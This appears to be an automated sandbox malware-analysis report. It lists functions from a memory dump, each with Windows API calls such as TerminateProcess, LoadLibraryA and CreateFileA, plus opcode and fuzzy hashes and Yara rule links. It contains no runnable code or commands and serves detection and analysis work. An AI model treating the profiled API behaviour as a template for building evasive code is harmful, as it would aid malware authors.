CloseServiceHandle.ADVAPI32(?,00000000,00000000,00000000,00000004,?,00000000,?,00003000,00000004), ref: 02180BE9
TerminateProcess.KERNELBASE(000000FF,00000000,000000FF,00000007,?,00000004,00000000,00000000,?,00003000,00000004), ref: 02182BD9

Memory Dump Source

Source File: 00000000.00000002.674395366.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Similarity

API ID: CloseHandleLibraryLoadProcessServiceTerminate
String ID:
API String ID: 3893904122-0
Opcode ID: f5d3ac5ce17bb73d14b1cca89eab2e4087a9807782b5331a1e860f5cff7123b5
Instruction ID: de7462b7ac2bb8ddd1274b4327899e5a32e494d8abe9d5c52e7d8bfe3beb3a69
Opcode Fuzzy Hash: f5d3ac5ce17bb73d14b1cca89eab2e4087a9807782b5331a1e860f5cff7123b5
Instruction Fuzzy Hash: B3519E245C434EA9EF393E1889E47FA22278F86368FA6421EDCD6570C5D765C88DCE42

Uniqueness

Uniqueness Score: -1.00%

Function 021809FC, Relevance: 3.2, APIs: 2, Instructions: 187serviceCOMMON

Download Yara Rule

APIs

Part of subcall function 021846F7: LoadLibraryA.KERNELBASE(?,321C9581,?,021857C6,021824A6,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 02184841

CloseServiceHandle.ADVAPI32(?,00000000,00000000,00000000,00000004,?,00000000,?,00003000,00000004), ref: 02180BE9
TerminateProcess.KERNELBASE(000000FF,00000000,000000FF,00000007,?,00000004,00000000,00000000,?,00003000,00000004), ref: 02182BD9

Memory Dump Source

Source File: 00000000.00000002.674395366.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Similarity

API ID: CloseHandleLibraryLoadProcessServiceTerminate
String ID:
API String ID: 3893904122-0
Opcode ID: bae8026ca9f2029224d25d6e4be98bc241af5d4847e67306e1189766e8bb8835
Instruction ID: 312c8e1429048a739575c98d7c87b68cec7a78a1a1416fd212c5f0b20ba8c26f
Opcode Fuzzy Hash: bae8026ca9f2029224d25d6e4be98bc241af5d4847e67306e1189766e8bb8835
Instruction Fuzzy Hash: 38518D245C434EA9EF38391889E47FA12278F863A4FA6021DDCD6930C5D765C88DCD52

Uniqueness

Uniqueness Score: -1.00%

Function 02180A2E, Relevance: 3.2, APIs: 2, Instructions: 174serviceCOMMON

Download Yara Rule

APIs

CloseServiceHandle.ADVAPI32(?,00000000,00000000,00000000,00000004,?,00000000,?,00003000,00000004), ref: 02180BE9
TerminateProcess.KERNELBASE(000000FF,00000000,000000FF,00000007,?,00000004,00000000,00000000,?,00003000,00000004), ref: 02182BD9

Memory Dump Source

Source File: 00000000.00000002.674395366.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Similarity

API ID: CloseHandleProcessServiceTerminate
String ID:
API String ID: 3808843656-0
Opcode ID: 1350a12476b2bb6c364d969cc2489bbac0a894e4abcac9d9a76dc57b930fc543
Instruction ID: 401ee2da8178a8355bd5aec135937ba311c002a555c5d3514ac30d8b98568e44
Opcode Fuzzy Hash: 1350a12476b2bb6c364d969cc2489bbac0a894e4abcac9d9a76dc57b930fc543
Instruction Fuzzy Hash: 10418D649C434EA9EF38391889F47FA1227CF863A8FA6061DDCD6930C5D765888DCE52

Uniqueness

Uniqueness Score: -1.00%

Function 02180A59, Relevance: 3.2, APIs: 2, Instructions: 162serviceCOMMON

Download Yara Rule

APIs

CloseServiceHandle.ADVAPI32(?,00000000,00000000,00000000,00000004,?,00000000,?,00003000,00000004), ref: 02180BE9
TerminateProcess.KERNELBASE(000000FF,00000000,000000FF,00000007,?,00000004,00000000,00000000,?,00003000,00000004), ref: 02182BD9

Memory Dump Source

Source File: 00000000.00000002.674395366.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Similarity

API ID: CloseHandleProcessServiceTerminate
String ID:
API String ID: 3808843656-0
Opcode ID: 18cf8c3f7389bf5894829dac64ae5eaa73a36cb4ec91dd4b6e193736042b525e
Instruction ID: de2b7c5514233aa339b6d74b071df00c8e2ba8719ba710bd1e5034de87112bd8
Opcode Fuzzy Hash: 18cf8c3f7389bf5894829dac64ae5eaa73a36cb4ec91dd4b6e193736042b525e
Instruction Fuzzy Hash: 3B418B245C434EA9EF38392889F47FA2227CF46368FA6060DDC96870C5DB25888D8D42

Uniqueness

Uniqueness Score: -1.00%

Function 02180A89, Relevance: 3.2, APIs: 2, Instructions: 154serviceCOMMON

Download Yara Rule

APIs

CloseServiceHandle.ADVAPI32(?,00000000,00000000,00000000,00000004,?,00000000,?,00003000,00000004), ref: 02180BE9

Memory Dump Source

Source File: 00000000.00000002.674395366.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Similarity

API ID: CloseHandleService
String ID:
API String ID: 1725840886-0
Opcode ID: 4f11f133c7f34621913db2adea508a5eb35de021b7d6f097ae259e4a220c0c27
Instruction ID: 512f91911929eb9df71e0c9d56c6fbc6d1ac62585069005431d69ca35df35148
Opcode Fuzzy Hash: 4f11f133c7f34621913db2adea508a5eb35de021b7d6f097ae259e4a220c0c27
Instruction Fuzzy Hash: 14418E3448834E9AEF383D2885F47FA2667CF42364FA6061EDCD6970C5DB25888DCE42

Uniqueness

Uniqueness Score: -1.00%

Function 02180AAD, Relevance: 3.1, APIs: 2, Instructions: 145serviceCOMMON

Download Yara Rule

APIs

CloseServiceHandle.ADVAPI32(?,00000000,00000000,00000000,00000004,?,00000000,?,00003000,00000004), ref: 02180BE9

Memory Dump Source

Source File: 00000000.00000002.674395366.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Similarity

API ID: CloseHandleService
String ID:
API String ID: 1725840886-0
Opcode ID: ffd3cc385adccb01114ac9e64a1aa66e3600c727d3045caa65dce20840ee4f8f
Instruction ID: 1442e57ebf9d51d88f59db382fe1bdfa18efbaef8a3dfd02dc2f108b1d3ddc1e
Opcode Fuzzy Hash: ffd3cc385adccb01114ac9e64a1aa66e3600c727d3045caa65dce20840ee4f8f
Instruction Fuzzy Hash: 3F418E2458434E99EF383D2885F43FE2267CF42364FA6461DDCD6530C5DB6598CD8D42

Uniqueness

Uniqueness Score: -1.00%

Function 02180ADF, Relevance: 3.1, APIs: 2, Instructions: 134serviceCOMMON

Download Yara Rule

APIs

CloseServiceHandle.ADVAPI32(?,00000000,00000000,00000000,00000004,?,00000000,?,00003000,00000004), ref: 02180BE9

Memory Dump Source

Source File: 00000000.00000002.674395366.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Similarity

API ID: CloseHandleService
String ID:
API String ID: 1725840886-0
Opcode ID: edefa6455008ab451e40b7542a41b8d1c7cbb234645c964336ad5eedb4be1648
Instruction ID: f0998fa3db99f068e0b07cabfe7b81d4cef1e0b241a0ce3ba8ac5e92793af2b3
Opcode Fuzzy Hash: edefa6455008ab451e40b7542a41b8d1c7cbb234645c964336ad5eedb4be1648
Instruction Fuzzy Hash: F9418B2448834E99EF387D2845F43FE26179F46368FA6464EDCE6930C1DB26C48DCE42

Uniqueness

Uniqueness Score: -1.00%

Function 02180B06, Relevance: 3.1, APIs: 2, Instructions: 130serviceCOMMON

Download Yara Rule

APIs

Part of subcall function 021846F7: LoadLibraryA.KERNELBASE(?,321C9581,?,021857C6,021824A6,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 02184841

CloseServiceHandle.ADVAPI32(?,00000000,00000000,00000000,00000004,?,00000000,?,00003000,00000004), ref: 02180BE9
TerminateProcess.KERNELBASE(000000FF,00000000,000000FF,00000007,?,00000004,00000000,00000000,?,00003000,00000004), ref: 02182BD9

Memory Dump Source

Source File: 00000000.00000002.674395366.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Similarity

API ID: CloseHandleLibraryLoadProcessServiceTerminate
String ID:
API String ID: 3893904122-0
Opcode ID: c5ba19cf3c3a4157e6010d13b3c7bb2ed017aaeb11b19ed0744e46b0d75fe11c
Instruction ID: 343b770ff038e7d60c6624ed3e26b131cfcfdddf3d95c44fb7a2d0400d7c571c
Opcode Fuzzy Hash: c5ba19cf3c3a4157e6010d13b3c7bb2ed017aaeb11b19ed0744e46b0d75fe11c
Instruction Fuzzy Hash: FF418E2448834EA9EF393D2849F43FE2667DF42368FA6424EDCD2970C1DB25848DCE52

Uniqueness

Uniqueness Score: -1.00%

Function 02180B44, Relevance: 3.1, APIs: 2, Instructions: 119serviceCOMMON

Download Yara Rule

APIs

Part of subcall function 021846F7: LoadLibraryA.KERNELBASE(?,321C9581,?,021857C6,021824A6,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 02184841

CloseServiceHandle.ADVAPI32(?,00000000,00000000,00000000,00000004,?,00000000,?,00003000,00000004), ref: 02180BE9
TerminateProcess.KERNELBASE(000000FF,00000000,000000FF,00000007,?,00000004,00000000,00000000,?,00003000,00000004), ref: 02182BD9

Memory Dump Source

Source File: 00000000.00000002.674395366.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Similarity

API ID: CloseHandleLibraryLoadProcessServiceTerminate
String ID:
API String ID: 3893904122-0
Opcode ID: 1f62d6775d212c9a3e732d8cffa8c2fb1fa969a79965eeb081c10beb91276e4a
Instruction ID: aff46e6ddf012517c54d6a8bfe81ed55cf8acb6bbccafa8cf2cf8d25a257bcf8
Opcode Fuzzy Hash: 1f62d6775d212c9a3e732d8cffa8c2fb1fa969a79965eeb081c10beb91276e4a
Instruction Fuzzy Hash: 7C31906448834E99EF383E2889F47FE2617DF42368FA6424ACDD6530C1D766848DCE52

Uniqueness

Uniqueness Score: -1.00%

Function 02180B99, Relevance: 3.1, APIs: 2, Instructions: 105serviceCOMMON

Download Yara Rule

APIs

CloseServiceHandle.ADVAPI32(?,00000000,00000000,00000000,00000004,?,00000000,?,00003000,00000004), ref: 02180BE9

Memory Dump Source

Source File: 00000000.00000002.674395366.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Similarity

API ID: CloseHandleService
String ID:
API String ID: 1725840886-0
Opcode ID: 8d1302dc6056219eaa0ade4000f17bcfdb82a0064c774906ecf9df8f79224803
Instruction ID: d444d9c5a391ec2b226bb7cd96a9d0f16fb53161fb1a10cce9842185212551d1
Opcode Fuzzy Hash: 8d1302dc6056219eaa0ade4000f17bcfdb82a0064c774906ecf9df8f79224803
Instruction Fuzzy Hash: D931CD6048834EAAEF343E3889E07FF265B8F42338F914249DCA6170C1DB76848DCE52

Uniqueness

Uniqueness Score: -1.00%

Function 02180BD7, Relevance: 3.1, APIs: 2, Instructions: 90serviceCOMMON

Download Yara Rule

APIs

CloseServiceHandle.ADVAPI32(?,00000000,00000000,00000000,00000004,?,00000000,?,00003000,00000004), ref: 02180BE9

Part of subcall function 021846F7: LoadLibraryA.KERNELBASE(?,321C9581,?,021857C6,021824A6,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 02184841

TerminateProcess.KERNELBASE(000000FF,00000000,000000FF,00000007,?,00000004,00000000,00000000,?,00003000,00000004), ref: 02182BD9

Memory Dump Source

Source File: 00000000.00000002.674395366.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Similarity

API ID: CloseHandleLibraryLoadProcessServiceTerminate
String ID:
API String ID: 3893904122-0
Opcode ID: 095b1957eba7deada0c4b1adc0b8f87d7effc3fdd315e3a5880148899c1f195a
Instruction ID: 31c47c8adbae8755804122d725c90a3f7baa76149c91a6751dd37fc52ee3cf51
Opcode Fuzzy Hash: 095b1957eba7deada0c4b1adc0b8f87d7effc3fdd315e3a5880148899c1f195a
Instruction Fuzzy Hash: D921C76048838EA9EF353E3889E43FE2A1A8F42338F910389DCA5470C1D766808DCE52

Uniqueness

Uniqueness Score: -1.00%

Function 02181270, Relevance: 1.6, APIs: 1, Instructions: 125libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,321C9581,?,021857C6,021824A6,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 02184841

Memory Dump Source

Source File: 00000000.00000002.674395366.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 53be649e17f86a3aa0d0ddfee55f2248c9ea18df937f5b9ebef92565cdf95ad3
Instruction ID: f5280e37dac0abc2f04168785cf6b51d372b33d362c945c47f3d860f8887673a
Opcode Fuzzy Hash: 53be649e17f86a3aa0d0ddfee55f2248c9ea18df937f5b9ebef92565cdf95ad3
Instruction Fuzzy Hash: D1316B306C428BBEEF393A605DD0BFE25279F933A0FA14136FDA746180DB654881CE12

Uniqueness

Uniqueness Score: -1.00%

Function 02182323, Relevance: 1.6, APIs: 1, Instructions: 119libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,321C9581,?,021857C6,021824A6,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 02184841

Memory Dump Source

Source File: 00000000.00000002.674395366.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: f4cbc1d6cb888d531876f38335e406d9d9d6a66adbfe46b4dd35f49dd7948daa
Instruction ID: 218cd782da5c428a6a0fa7f12abe337b4c3ff0b40b488aab9d85cd03f943a13d
Opcode Fuzzy Hash: f4cbc1d6cb888d531876f38335e406d9d9d6a66adbfe46b4dd35f49dd7948daa
Instruction Fuzzy Hash: 903168702CA7C6CEEB3E790146D437671A2AF56745F06463F9EAB22450CB788080DD27

Uniqueness

Uniqueness Score: -1.00%

Function 02180BFF, Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 021846F7: LoadLibraryA.KERNELBASE(?,321C9581,?,021857C6,021824A6,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 02184841

TerminateProcess.KERNELBASE(000000FF,00000000,000000FF,00000007,?,00000004,00000000,00000000,?,00003000,00000004), ref: 02182BD9

Memory Dump Source

Source File: 00000000.00000002.674395366.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Similarity

API ID: LibraryLoadProcessTerminate
String ID:
API String ID: 3349790660-0
Opcode ID: c4292795902133995e9db45222e5269fe690997001d667d778469fef06b6eab5
Instruction ID: b0c70cdaf4ef60f8e89a46f2ce9f3e6988b73397b31ffe2823e6d17e61a6eafa
Opcode Fuzzy Hash: c4292795902133995e9db45222e5269fe690997001d667d778469fef06b6eab5
Instruction Fuzzy Hash: BC21DD6448C38EA9EF213E3889E43FF2A5A9F02378F564389DCA5160C5D766808DCE52

Uniqueness

Uniqueness Score: -1.00%

Function 02184716, Relevance: 1.6, APIs: 1, Instructions: 66libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,321C9581,?,021857C6,021824A6,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 02184841

Memory Dump Source

Source File: 00000000.00000002.674395366.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 767ce8482770cd31bdd01ec6683f5b4ae1929b3b88401062bdc51cc883e844d7
Instruction ID: 1fd3eeac19c9e414fd0f3b5c10500d616d9527472c1dc44fcb573125836559d1
Opcode Fuzzy Hash: 767ce8482770cd31bdd01ec6683f5b4ae1929b3b88401062bdc51cc883e844d7
Instruction Fuzzy Hash: 021148645CD3CB5ACB1977B06AD077C2E16AF03254F5541BBDDE285081DF148008CE12

Uniqueness

Uniqueness Score: -1.00%

Function 0218474E, Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,321C9581,?,021857C6,021824A6,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 02184841

Memory Dump Source

Source File: 00000000.00000002.674395366.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 34ed84814ee61eea13bcbca20a07be194f8154097574e73be40cc8eef19619ca
Instruction ID: 9d75b57f5bf374959da9f432c4c306467cdecfdda1db01b7373971bc3a60ce26
Opcode Fuzzy Hash: 34ed84814ee61eea13bcbca20a07be194f8154097574e73be40cc8eef19619ca
Instruction Fuzzy Hash: 7211E1685CD3DB6ADB1AB7B0A9D137C6E49AF43218F0A81BADDD185082DF148419CE62

Uniqueness

Uniqueness Score: -1.00%

Function 02180C43, Relevance: 1.6, APIs: 1, Instructions: 59COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(000000FF,00000000,000000FF,00000007,?,00000004,00000000,00000000,?,00003000,00000004), ref: 02182BD9

Memory Dump Source

Source File: 00000000.00000002.674395366.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: 63b1390e3e5b0482ca42c335295a7c65745b78bf543720f71ba09463c99ab1e2
Instruction ID: 631b447616be75c63bdc4a45bf241f678574ee74a0f55c57f3646868dbaf3376
Opcode Fuzzy Hash: 63b1390e3e5b0482ca42c335295a7c65745b78bf543720f71ba09463c99ab1e2
Instruction Fuzzy Hash: 5E118C7048838E99EF343E3889F43FF16628F01368F854349CCA9020C6D72A908DCE53

Uniqueness

Uniqueness Score: -1.00%

Function 02180C65, Relevance: 1.6, APIs: 1, Instructions: 59COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(000000FF,00000000,000000FF,00000007,?,00000004,00000000,00000000,?,00003000,00000004), ref: 02182BD9

Memory Dump Source

Source File: 00000000.00000002.674395366.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: bd198e0fd94412026d5f45e1e57f5a94b01547192b36b39a72608aeff45ccad7
Instruction ID: b31a70a6849dede688322119a6185533023b5c42ced9fe39d89f19bdca541338
Opcode Fuzzy Hash: bd198e0fd94412026d5f45e1e57f5a94b01547192b36b39a72608aeff45ccad7
Instruction Fuzzy Hash: D7116B7448D38FAAEF257E3889F43FE2A569F02368F860289CCD5065C5D766508ECF52

Uniqueness

Uniqueness Score: -1.00%

Function 021846F7, Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,321C9581,?,021857C6,021824A6,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 02184841

Memory Dump Source

Source File: 00000000.00000002.674395366.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: eea92af0af325c0faa23de2c709e2f1735d0afc6fe7e8671def336878cccf7bc
Instruction ID: e40586c530366928afcf8ced49a47db2ed76e94167d087327deda4e0d48cae93
Opcode Fuzzy Hash: eea92af0af325c0faa23de2c709e2f1735d0afc6fe7e8671def336878cccf7bc
Instruction Fuzzy Hash: F401F9606C92C79DDA6C3AA069D47BD25226F53790F928137ED7341004EF258540CD53

Uniqueness

Uniqueness Score: -1.00%

Function 0218470B, Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,321C9581,?,021857C6,021824A6,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 02184841

Memory Dump Source

Source File: 00000000.00000002.674395366.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 98e0aef22fc1edf9dc829e19353709759e6795135b5497f8367ea255e48ae252
Instruction ID: 7d81f8a296297117d2114cb4996dc6cb85bed73d697288f12ca882c18fe3b6ed
Opcode Fuzzy Hash: 98e0aef22fc1edf9dc829e19353709759e6795135b5497f8367ea255e48ae252
Instruction Fuzzy Hash: 7D01F9606C81C79DDA6C3AA069D47BD15226F53790F928137ED7381004EF258540CD53

Uniqueness

Uniqueness Score: -1.00%

Function 021847B7, Relevance: 1.5, APIs: 1, Instructions: 49libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,321C9581,?,021857C6,021824A6,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 02184841

Memory Dump Source

Source File: 00000000.00000002.674395366.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 9e4ad66fd667ef0902d36c970ffb328ef5ba70d14d90f16a969808278cdb9dd4
Instruction ID: 597fa004401050e8127e02d703e813019a3065c2fb458fadc85c80b62832235d
Opcode Fuzzy Hash: 9e4ad66fd667ef0902d36c970ffb328ef5ba70d14d90f16a969808278cdb9dd4
Instruction Fuzzy Hash: 05F0AF6408E3DB96C60976B069D177C6E0AEF43244B4A84AAADD189580DF209119CE56

Uniqueness

Uniqueness Score: -1.00%

Function 02180C93, Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(000000FF,00000000,000000FF,00000007,?,00000004,00000000,00000000,?,00003000,00000004), ref: 02182BD9

Memory Dump Source

Source File: 00000000.00000002.674395366.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: cb75b6ddc31d61c6d0e7e615a9a545dcbfe79d25ab2376a46ae69458134bd89c
Instruction ID: fee12e9a82de2a27b82c97f4e8a321af4ae0c4ac040cddd630cb7812702aca20
Opcode Fuzzy Hash: cb75b6ddc31d61c6d0e7e615a9a545dcbfe79d25ab2376a46ae69458134bd89c
Instruction Fuzzy Hash: 1701687408D3CF59EF217A3885E43FE2A559F0236CF494289CC99061C5D366504ACF52

Uniqueness

Uniqueness Score: -1.00%

Function 0218478F, Relevance: 1.5, APIs: 1, Instructions: 43libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,321C9581,?,021857C6,021824A6,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 02184841

Memory Dump Source

Source File: 00000000.00000002.674395366.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: d3b5b8edef82e780ac0f6b0793088851a142e9f29984d4ed3cdc52c814273e26
Instruction ID: 008765f0ef76625e075d6e05c81e505e5c77ffbbde1d546cf212fc21fcc1f886
Opcode Fuzzy Hash: d3b5b8edef82e780ac0f6b0793088851a142e9f29984d4ed3cdc52c814273e26
Instruction Fuzzy Hash: 99F024245C92CB9ACA1C7BB079D07BC2A06AF43340F118177EDE285080DF248544CE53

Uniqueness

Uniqueness Score: -1.00%

Function 02180CD6, Relevance: 1.5, APIs: 1, Instructions: 38COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(000000FF,00000000,000000FF,00000007,?,00000004,00000000,00000000,?,00003000,00000004), ref: 02182BD9

Memory Dump Source

Source File: 00000000.00000002.674395366.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: 94385fdcc527c0f2e630854a2b0affc25a4e309924873d88012dc8e14d258eb4
Instruction ID: da9b4e685833f5c71ea860191ae78032a6a8abe2a068f2c33ef953d53f7f2e24
Opcode Fuzzy Hash: 94385fdcc527c0f2e630854a2b0affc25a4e309924873d88012dc8e14d258eb4
Instruction Fuzzy Hash: 9CF0223444D3CAAAEB12BB3449843BDBF85AF43328F8942CC8C94161C2E766504ACF52

Uniqueness

Uniqueness Score: -1.00%

Function 0218480E, Relevance: 1.5, APIs: 1, Instructions: 31libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,321C9581,?,021857C6,021824A6,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 02184841

Memory Dump Source

Source File: 00000000.00000002.674395366.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 9b4d48dd8bc6bf2c7b183eb1f5da91990daa196073c2e4ce970985575d4772de
Instruction ID: 49446a09a11cd6fe8988ad4ab1c11e70f1451617e53d3d624b5cb4675685395a
Opcode Fuzzy Hash: 9b4d48dd8bc6bf2c7b183eb1f5da91990daa196073c2e4ce970985575d4772de
Instruction Fuzzy Hash: 29F0E52854E3DA5B8705B77059D837CBE4DED4311470A80FD9D918E4C5CB604408CF50

Uniqueness

Uniqueness Score: -1.00%

Function 02180D17, Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(000000FF,00000000,000000FF,00000007,?,00000004,00000000,00000000,?,00003000,00000004), ref: 02182BD9

Memory Dump Source

Source File: 00000000.00000002.674395366.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: 2d563d8e3f27eea9793c6f89e015eaffede43ea8fbabc6e7452a40ba2fd37249
Instruction ID: 9226a14a98c762c8fd11750e8f32350fd64f528d73e8de3ab9c72449b5f2d1f2
Opcode Fuzzy Hash: 2d563d8e3f27eea9793c6f89e015eaffede43ea8fbabc6e7452a40ba2fd37249
Instruction Fuzzy Hash: 25E0262404E3CBAAEB1267345AE5BB9AE489F4326CF8D42CD9CE9558C1D7404049C721

Uniqueness

Uniqueness Score: -1.00%

Function 021847F3, Relevance: 1.5, APIs: 1, Instructions: 27libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,321C9581,?,021857C6,021824A6,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 02184841

Memory Dump Source

Source File: 00000000.00000002.674395366.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: feb607e6ebd8c2d4743327f61d55dcab7561c5403251e844bcf8c03fdd146d66
Instruction ID: fe26473843104a49276dd419902887aed79dbeea7fa24da9a5f96a3073142802
Opcode Fuzzy Hash: feb607e6ebd8c2d4743327f61d55dcab7561c5403251e844bcf8c03fdd146d66
Instruction Fuzzy Hash: A6E086646CA3DB9A870D7BA069E46BC6A0AAF8328471581BAADE289040CF244518CF56

Uniqueness

Uniqueness Score: -1.00%

Function 02182BC0, Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(000000FF,00000000,000000FF,00000007,?,00000004,00000000,00000000,?,00003000,00000004), ref: 02182BD9

Memory Dump Source

Source File: 00000000.00000002.674395366.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: 7eac171aaf2f2bc4464bfad10c116caf0fa138838a0373b338414585560f6c1b
Instruction ID: 40fdd078601fe672f9fe20df1a35911b0edfe34df1b763198dbc17275ae31b4f
Opcode Fuzzy Hash: 7eac171aaf2f2bc4464bfad10c116caf0fa138838a0373b338414585560f6c1b
Instruction Fuzzy Hash: 17D0126810D39F66DA5053707D8AB987E4C9F431BCE490385ADB9985C1DF81445DC324

Uniqueness

Uniqueness Score: -1.00%

Function 02182F87, Relevance: 1.5, APIs: 1, Instructions: 12fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,02182F16,02182FC7,021806CA), ref: 02182FA2

Memory Dump Source

Source File: 00000000.00000002.674395366.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: e6d4883f9b9cd4c8aaaade39fe579cf0a57f8bc2ad32903d463891b58212c4d6
Instruction ID: 58e06234e4adfd98c53b464d7f6930302609c6ab0994e5a3d75330c353b67c2c
Opcode Fuzzy Hash: e6d4883f9b9cd4c8aaaade39fe579cf0a57f8bc2ad32903d463891b58212c4d6
Instruction Fuzzy Hash: 63C04C757E4304BAFE34D6604D96FC566569794F00E60450A770A3D1C485F5A950C61A

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0218578B, Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.674395366.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Similarity

API ID: LibraryLoadMemoryProtectVirtual
String ID:
API String ID: 3389902171-0
Opcode ID: d8957f571d5858ad2427dbafb35e3fee0e7c85f0432c46d35cd4c952bf28823c
Instruction ID: e4ff59cc5c8681c3d4bc4371dda90f91f0eaacef77fb12ee9d42be4d79b122de
Opcode Fuzzy Hash: d8957f571d5858ad2427dbafb35e3fee0e7c85f0432c46d35cd4c952bf28823c
Instruction Fuzzy Hash: 97A1E970588346EECF28EF2884D4765B793DF12264FCB829AD9A64B2D6C3318446CF13

Uniqueness

Uniqueness Score: -1.00%

Function 0218578F, Relevance: .2, Instructions: 178COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.674395366.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Similarity

API ID: LibraryLoadMemoryProtectVirtual
String ID:
API String ID: 3389902171-0
Opcode ID: e94b790cc6bd0722d277b97e3a51b20b121f9db0b3f53d3483a6c5107022e793
Instruction ID: 97ebc7cb4875b4be4701c54362af7ce76d55de30eb5818e26b7a8efbd45127e3
Opcode Fuzzy Hash: e94b790cc6bd0722d277b97e3a51b20b121f9db0b3f53d3483a6c5107022e793
Instruction Fuzzy Hash: 3A51C970588342DECB25EF2884D4765BBD3EF12260F9BC29ADDA64B2D6D3318446CF12

Uniqueness

Uniqueness Score: -1.00%
